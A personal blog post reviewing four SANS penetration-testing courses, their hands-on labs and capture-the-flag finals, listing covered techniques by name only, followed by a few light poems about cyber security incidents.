  1. SEC504 Hacker Techniques Exploits & Incident Handling
  2. SEC560 Network Penetration Testing and Ethical Hacking
  3. SEC575 Mobile Device Security and Ethical Hacking
  4. SEC617 Wireless Ethical Hacking, Penetration Testing, and Defenses

The SANS courses tuition is on the expensive side, ranging from $6000-$9000 USD. Add travel and accommodations and you are looking at about $12K per class. Each course is delivered in about a week (40-60 hours of classroom activity).  Classes are divided into lectures and hands-on labs with heavy emphasis on getting down and dirty.

Though it took me several months to complete the coursework, I have found the whole experience to be uplifting. In addition to getting access to practical, real-world expertise from some of the world’s best penetration testers, we practiced the gray art of performing detailed reconnaissance on would-be targets including mining a social media, and infrastructure data from blogs, forums, search engines, social networking sites, and other Internet resources.

In each course, we used the latest cutting-edge attack tools as well as the traditional low budget techniques that are still quite prevalent. The aim of the course was to push the envelope in each domain and not to merely teach a handful of hacks and tricks. Another great component was exploring various administrative questions such as legal issues associated with responding to computer attacks, employee monitoring, working with law enforcement, and the collection and handling of evidence.

SANS Capture the Flag Las Vagas 2015

When it came to performing the actual exploit, we got to use the best tools on the market. This included both, COTS components and custom written utilities and scripts. In each class we learned dozens of methods for exploiting target systems and how to gain access to the systems post-exploitation. Just to illustrate the extensive hands-on approach that SANS adapted in teaching Penetrating Testing, here is a list of tools and techniques that we used in just the SEC 504 course:

– RootKits and detection
– Hidden file detection with LADS
– HTTP Reverse Shells using Base64
– InSSIDer for Wireless LAN discovery
– Nmap Port Scanner and Operating System fingerprinting tool
– Nessus Vulnerability Scanner
– Windows Command Line Kung-Fu for extracting Windows data through SMB sessions
– Sniffers, including Tcpdump
– Sniffer detection tools, including ifconfig, ifstatus, and promiscdetect
– Netcat for transferring files, creating backdoors, and setting up relays
– Metasploit, Metasploit, Metasploit Lots of Metasploit
– ARP and MAC analysis for ARP cache poisoning attack detection
– Password cracking
– Cross-site scripting and SQL injection web application attacks
– Intercepting and forging session cookies
– Detecting and executing DoS attacks techniques
– Detecting backdoors with Netstat, lsof
– Covert channels using Covert TCP
– clandestine network scanning and mapping
– Exploitation using built in OS commands
– Privilege escalation
– Advanced pivoting techniques

The great thing about the SANS curriculum is that they go pretty far down into the rabbit hole. A few of the classes required hard core coding skills (you get to write/execute some buffer overflows). Other classes were procedural and got down to the wire in terms of the inner functioning of RFC and protocol. For example, in the Wireless Ethical Hacking we had comprehensive coverage of WiFi, cordless telephones, smart devices, embedded home devices, mash technologies like ZigBee and Z-Wave, Bluetooth, DECT, and NFCs.

In the Mobile Device Security we practiced reverse-engineering iOS binaries in Objective-C, reverse-engineering Android binaries in Java and Dalvik Bytecode, evaluating mobile malware threats through source-code analysis, defeating Apple FairPlay encryption for application binary access, and overcoming anti-decompilation techniques.

SANS Capture the Flag Washington DC 2015

The participants in the classes came from diverse backgrounds, including three letter agencies, LEA incident handling team members, and security administrators. The classes are well-suited for anyone with a good command of TCPIP and networking and they would also benefit architects and technical leads involved in security operations and R&D.

The delivery of the material is completely immersive. You go from 0-90 in one second.  Each course is equivalent to a traditional graduate semester course of 4 credits so we had to complete an average of one textbook per day.  At times, you feel like you are drinking and showering from a fire hose.

Taking good notes and hitting the books at night will help you stay afloat. It goes without saying that the instructors were outstanding; they offered unlimited tutoring and were always available—even during lunch and after hours—to help answer questions and work through the practice labs.

Yaacov Apelbaum - SANS SEC504 Yaacov Apelbaum - SANS SEC560 Yaacov Apelbaum - SANS SEC575 Yaacov Apelbaum - SANS SEC617

Several interesting sessions in each class revolved around learning how to avoid being caught through various tactics and strategies for covering your tracks such as: File and directory camouflage, piggybacking on existing user Internet sessions to avoid detection, event log tampering and pruning, and performing memory cleanups.

For me, the best part of each course was the final session called “Capture the Flag”.  There, in a culmination of all of the hard work, we got to practice everything we had learned over the previous week. Each class had different parameters for capturing the flag, but they tended to follow the same patterns.

We needed to do some reconnaissance, reconstruct the network layout of our target, map our victim’s equipment and software inventory, and then proceed to execute the attacks. Once you breached the target, you would perform some additional exploits and start pivoting between hosts and ‘living off the land”. The overall objective of this exercise was to collect flags that had been placed on various locations on the victims’ network by the instructor. Some of these flags contained encrypted files or messages that we needed to decrypt and use as clues for other attacks, others involved passwords that were being sent over VOIP, in memory session information, or data hidden in binaries.

SANS Capture the Flag Boston 2015

The capture the flag event usually lasts a full day and ends when one team successfully recovers all flags. At that point, the competition is stopped, the results are verified, and the winners are awarded the coveted challenge coins.

Yaacov Apelbuam SANS 575 Capture the Flag Token  Yaacov Apelbuam SANS 617 Capture the Flag Token  560-capture-the-flag-token

If you are a computer security practitioner, I highly recommend that you take all four courses. Even if you can only afford one, go for it. It will change your prospective on pen testing forever and help you take a proactive role in keeping your company safe and out of the negative limelight.

Performing a good penetration test is much more than just hiring some outside help and rubber stamping an audit. Verifying the integrity of your corporate security, takes more than kicking the tires and lifting the hood these days. Anyone can throw a bunch of attacks against an organization and regurgitate the output of some automated tools in hundreds of pages of reports.

Participating in hands-on structured training will help you avoid this trap and allow you to fully grasp your company’s real security needs so that you can prioritize and formulate the most appropriate plan of action to in the most cost effective and timely manner.

Going through the meat grinder, you get to witness first hand the process of hot dog making. It’s not a pretty sight, but its an informative one. One of my most profound takeaways from this whole experience was answering the existential question of the spoon. Yes, the spoon does exist, but only for the end-user, sysadmin, DBA, and auditors. There is no spoon if you are a proficient attacker. With the right strategy and tools, concepts such as access control, event log integrity, and passwords are meaningless and are but chaff before the wind.

Yaacov Apelbaum - There is no Spoon

I keep my three hard earned challenge coins on my office bookshelf as a reminder that there is likely someone out there right now who is targeting my network through some kind a a clever attack. He/she has all the right tools and resources and are as determined and hard working as I was to get his coins.

And as far as my earlier MBA comment is concerned, if you are curious to know just how many managers attended the classes, the answer is just one. None of the 20-40 participants in each classes had managerial responsibility. In fact most of the folks I spoke to were surprised that a CTO would take time from his schedule and opt to get his hands dirty instead of just delegating this to one of his directs.

After all, ‘Isn’t that what a manager is supposed to do?’

© Copyright 2015 Yaacov Apelbaum All Rights Reserved.

Cyber Security Poetry

Cyber Beatnic Poetry

Tokens of Distrust
It was on a starless March night,
The spear phishers went out for bite.

Through a zero day vulnerability,
They breached RSA’s network security.

A Trojan attached to an email transmission,
Gave the attackers remote access permission. 

Deep into the corporate systems they dove, 
Collecting the SecureID key seeds treasure trove.

The theft effected over forty million tokens,
Transparency failed and trust was broken.

A few weeks followed and on a moonless May night,
The spear fishers returned with a renewed appetite.

Over the internet via secure VPN and a forged key,
They breached Lockheed’s defenses and Pwned ’their IP.


Ties That Bind
Identity, how do I bind thee to an object? Let me recount the ways. 
One, by a secret.
Two, by a token.
Three, by your essence.
Four, by space and time.


Risk Appetite
A little shiftless fella named Phil,
Landed a CISO gig through a shady deal. 

Clueless about cyber security threats,
He managed his way upwards like a rat.

Pen tests and remediation took a back seat,
To what the cafeteria was serving to eat.


When the company was finally breached by a hack,
He said “C’est la vie! The insurance will cover our back.”